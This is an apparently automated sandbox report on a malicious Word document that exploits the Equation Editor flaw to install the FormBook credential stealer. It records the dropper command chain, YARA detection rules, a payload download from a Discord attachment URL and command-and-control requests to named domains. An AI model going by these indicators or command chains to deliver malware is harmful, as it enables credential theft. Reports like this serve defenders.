
Analysis Report ENQ-015August 2020 R1 Proj LOT.doc

Overview

General Information

Sample Name: ENQ-015August 2020 R1 Proj LOT.doc
Analysis ID: 288627
MD5: 9c245d978c53949241e96b53f565a9a0
SHA1: 3859c7450179c4d7ec7f7fc8f5d161f1674f886d
SHA256: d8dca1637184327ff59dfebda5b0cbc210a7f9c8d5c88c167a527a896003909d
Tags: doc


Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Benign windows process drops PE files
Detected FormBook malware
Document exploit detected (creates forbidden files)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: Office product drops script at suspicious location
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Creates processes via WMI
Found potential equation exploit (CVE-2017-11882)
Found suspicious RTF objects
Injects a PE file into a foreign process
Maps a DLL or memory area into another process
Microsoft Office drops suspicious files
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: WScript or CScript Dropper
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Very long command line found
Writes to foreign memory regions
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches the installation path of Mozilla Firefox
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found; this is very uncommon (may be encrypted or packed)
Yara signature match


Startup

  • System is w7x64
  • WINWORD.EXE (PID: 2128 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • EQNEDT32.EXE (PID: 2236 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • cmd.exe (PID: 1492 cmdline: CmD.exe /C cscript %tmp%\paul.vbs A C MD5: AD7B9C14083B52BC532FBA5948342B98)
      • cscript.exe (PID: 2288 cmdline: cscript C:\Users\user\AppData\Local\Temp\paul.vbs A C MD5: A3A35EE79C64A640152B3113E6E254E2)
        • cmd.exe (PID: 2284 cmdline: cmd /c sc query wcncsvc >> A C MD5: AD7B9C14083B52BC532FBA5948342B98)
        • cmd.exe (PID: 1296 cmdline: cmd /c sc query wcncsvc >> A C MD5: AD7B9C14083B52BC532FBA5948342B98)
  • powershell.exe (PID: 2296 cmdline: Powershell [long encoded command line omitted] MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • calc.exe (PID: 2344 cmdline: {path} MD5: 60B7C0FEAD45F2066E5B805A91F4F0FC)
      • explorer.exe (PID: 1388 cmdline: MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
        • cscript.exe (PID: 2788 cmdline: C:\Windows\SysWOW64\cscript.exe MD5: A3A35EE79C64A640152B3113E6E254E2)
          • cmd.exe (PID: 3032 cmdline: /c del 'C:\WINDOWS\syswow64\calc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
          • firefox.exe (PID: 1544 cmdline: C:\Program Files (x86)\Mozilla Firefox\Firefox.exe MD5: C2D924CE9EA2EE3E7B7E6A7C476619CA)
        • help2dxlg.exe (PID: 2876 cmdline: C:\Program Files (x86)\Fntqll8l\help2dxlg.exe MD5: 60B7C0FEAD45F2066E5B805A91F4F0FC)
        • help2dxlg.exe (PID: 2252 cmdline: 'C:\Program Files (x86)\Fntqll8l\help2dxlg.exe' MD5: 60B7C0FEAD45F2066E5B805A91F4F0FC)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source | Rule | Description | Author | Strings
ENQ-015August 2020 R1 Proj LOT.doc | MAL_RTF_Embedded_OLE_PE | Detects a suspicious string often used in PE files in a hex encoded object stream | Florian Roth
  • 0xcaa:$a3: 433a5c66616b65706174685c
  • 0xce4:$a3: 433a5c66616b65706174685c

Memory Dumps

Source | Rule | Description | Author | Strings
0000000C.00000002.2164882821.0000000000240000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0000000C.00000002.2164882821.0000000000240000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b257:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c25a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000C.00000002.2164882821.0000000000240000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18339:$sqlite3step: 68 34 1C 7B E1
  • 0x1844c:$sqlite3step: 68 34 1C 7B E1
  • 0x18368:$sqlite3text: 68 38 2A 90 C5
  • 0x1848d:$sqlite3text: 68 38 2A 90 C5
  • 0x1837b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x184a3:$sqlite3blob: 68 53 D8 7F 8C
0000000C.00000002.2164965721.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0000000C.00000002.2164965721.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b257:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c25a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(16 further entries not shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
12.2.calc.exe.400000.1.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
12.2.calc.exe.400000.1.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1a457:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1b45a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
12.2.calc.exe.400000.1.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x17539:$sqlite3step: 68 34 1C 7B E1
  • 0x1764c:$sqlite3step: 68 34 1C 7B E1
  • 0x17568:$sqlite3text: 68 38 2A 90 C5
  • 0x1768d:$sqlite3text: 68 38 2A 90 C5
  • 0x1757b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x176a3:$sqlite3blob: 68 53 D8 7F 8C
12.2.calc.exe.400000.1.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
12.2.calc.exe.400000.1.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b257:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c25a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(1 further entry not shown)

Sigma Overview

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882
Source: Process started; Author: Florian Roth; Data: Command: CmD.exe /C cscript %tmp%\paul.vbs A C, CommandLine: CmD.exe /C cscript %tmp%\paul.vbs A C, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2236, ProcessCommandLine: CmD.exe /C cscript %tmp%\paul.vbs A C, ProcessId: 1492
Sigma detected: Office product drops script at suspicious location
Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 2128, TargetFilename: C:\Users\user\AppData\Local\Temp\paul.vbs
Sigma detected: WScript or CScript Dropper
Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (rule); Data: Command: cscript C:\Users\user\AppData\Local\Temp\paul.vbs A C, CommandLine: cscript C:\Users\user\AppData\Local\Temp\paul.vbs A C, CommandLine|base64offset|contains: r+, Image: C:\Windows\SysWOW64\cscript.exe, NewProcessName: C:\Windows\SysWOW64\cscript.exe, OriginalFileName: C:\Windows\SysWOW64\cscript.exe, ParentCommandLine: CmD.exe /C cscript %tmp%\paul.vbs A C, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1492, ProcessCommandLine: cscript C:\Users\user\AppData\Local\Temp\paul.vbs A C, ProcessId: 2288

Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: ENQ-015August 2020 R1 Proj LOT.doc; Virustotal: Detection: 16%
Yara detected FormBook
Source: Yara match; File source: 0000000C.00000002.2164882821.0000000000240000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000C.00000002.2164965721.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000E.00000002.2359405050.0000000000070000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000011.00000002.2270980659.0000000000140000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000C.00000002.2164770798.00000000000F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000E.00000002.2359785911.00000000002E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000E.00000002.2359534677.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 12.2.calc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 12.2.calc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: 12.2.calc.exe.400000.1.unpack; Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Found potential equation exploit (CVE-2017-11882)
Source: Static RTF information: Object: 2 Offset: 00005D29h
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Process created: C:\Windows\SysWOW64\cmd.exe
Source: unknown; Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 14_2_0095F0D3 GetFileAttributesW,GetLastError,FindFirstFileW,WideCharToMultiByte,WideCharToMultiByte,GetLastError,WideCharToMultiByte,GetFileAttributesA,GetLastError,FindFirstFileA,FindClose; 14_2_0095F0D3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

Software Vulnerabilities:

Document exploit detected (creates forbidden files)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File created: C:\Users\user\AppData\Local\Temp\paul.vbs
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 4x nop then sub dword ptr [esp+04h], 0Ch; 14_2_00955AD1
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 4x nop then mov edi, edi; 14_2_00956626
Source: C:\Program Files (x86)\Mozilla Firefox\firefox.exe; Code function: 4x nop then pop edi; 17_2_00175240
Source: C:\Program Files (x86)\Mozilla Firefox\firefox.exe; Code function: 4x nop then pop edi; 17_2_0017D3B0
Source: C:\Program Files (x86)\Mozilla Firefox\firefox.exe; Code function: 4x nop then pop edi; 17_2_0017E536
Source: C:\Program Files (x86)\Mozilla Firefox\firefox.exe; Code function: 4x nop then pop edi; 17_2_0017E540
Source: C:\Program Files (x86)\Mozilla Firefox\firefox.exe; Code function: 4x nop then pop ebx; 17_2_0016E6C0
Source: C:\Program Files (x86)\Mozilla Firefox\firefox.exe; Code function: 4x nop then pop edi; 17_2_0017E6F6
Source: C:\Program Files (x86)\Mozilla Firefox\firefox.exe; Code function: 4x nop then pop edi; 17_2_0017E6F8
Source: C:\Program Files (x86)\Mozilla Firefox\firefox.exe; Code function: 4x nop then pop esi; 17_2_0017DF50
Source: C:\Program Files (x86)\Fntqll8l\help2dxlg.exe; Code function: 4x nop then push 001F2BC0h; 18_2_001F2B9C
Source: C:\Program Files (x86)\Fntqll8l\help2dxlg.exe; Code function: 4x nop then dec dword ptr [ebp+08h]; 18_2_002281E0
Source: C:\Program Files (x86)\Fntqll8l\help2dxlg.exe; Code function: 4x nop then mov edi, edi; 18_2_001ED258
Source: C:\Program Files (x86)\Fntqll8l\help2dxlg.exe; Code function: 4x nop then mov edi, edi; 18_2_001E3398
Source: C:\Program Files (x86)\Fntqll8l\help2dxlg.exe; Code function: 4x nop then push 00000050h; 18_2_0021C9A8
Source: C:\Program Files (x86)\Fntqll8l\help2dxlg.exe; Code function: 4x nop then mov edi, edi; 18_2_00226A4F
Source: C:\Program Files (x86)\Fntqll8l\help2dxlg.exe; Code function: 4x nop then add byte ptr [eax+00008000h], bh; 18_2_00227DD8
Source: C:\Program Files (x86)\Fntqll8l\help2dxlg.exe; Code function: 4x nop then arpl word ptr [eax], ax; 18_2_001FFE50
Source: global traffic; DNS query: name: cdn.discordapp.com
Source: global traffic; TCP traffic: 192.168.2.22:49168 -> 162.159.130.233:443
Source: global traffic; TCP traffic: 192.168.2.22:49167 -> 162.159.129.233:80
Source: global traffic; HTTP traffic detected:
    GET /attachments/722888184203051118/757862128198877274/Stub.jpg HTTP/1.1
    Host: cdn.discordapp.com
    Connection: Keep-Alive
Source: global traffic; HTTP traffic detected:
    GET /pua/?nnI8w=WBBxsZ-pnZFthb5&0bwLaJ=8SPtAIzhs1kJDjEus8qRsOCx/qtdFd8iRUK/VAsrgKs7MSM9s1X09hsE3iAkaCEODcoJhA== HTTP/1.1
    Host: www.enlightenedleadersacademy.com
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:
Source: global traffic; HTTP traffic detected:
    GET /pua/?0bwLaJ=DI4ZKeLJ+JROT0GJyKxCLbLBFhDYDJpWnDBCM766gcJPggggQfC7bYRs5cJZLi3aVysgqw==&nnI8w=WBBxsZ-pnZFthb5&sql=1 HTTP/1.1
    Host: www.tiktkus.info
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:
Source: global traffic; HTTP traffic detected:
    GET /pua/?nnI8w=WBBxsZ-pnZFthb5&0bwLaJ=pb9Vn6p0QKF0PrcHHVnyLUR5E5TgtNlPO4FPz3Mk8e1ZsC+s/Ab/ERO6s36dji6qKC4V/Q==&sql=1 HTTP/1.1
    Host: www.78500907.xyz
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:
Source: Joe Sandbox View; IP Address: 162.159.130.233
Source: Joe Sandbox View; IP Address: 162.159.129.233
Source: Joe Sandbox View; ASN Name: DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU
Source: Joe Sandbox View; JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{11DEB0C5-C3B5-4777-B8A0-8FBD94489CF9}.tmp
Source: unknown; DNS traffic detected: queries for: cdn.discordapp.com
Source: unknown; HTTP traffic detected:
    POST /pua/ HTTP/1.1
    Host: www.tiktkus.info
    Connection: close
    Content-Length: 184696
    Cache-Control: no-cache
    Origin: http://www.tiktkus.info
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://www.tiktkus.info/pua/
    Accept-Language: en-US
    Accept-Encoding: gzip, deflate
    Data Raw: [hex request body omitted]
Source: global traffic; HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Content-Type: text/html; charset=iso-8859-1
    Content-Length: 285
    Accept-Ranges: bytes
    Date: Tue, 22 Sep 2020 13:54:26 GMT
    X-Varnish: 168141746
    Age: 0
    Via: 1.1 varnish
    Connection: close
    X-Varnish-Cache: MISS
    Server: C2M Server v1.02
    Data Raw: [hex body omitted; decoded form follows]
    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /pua/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.78500907.xyz Port 8080</address></body></html>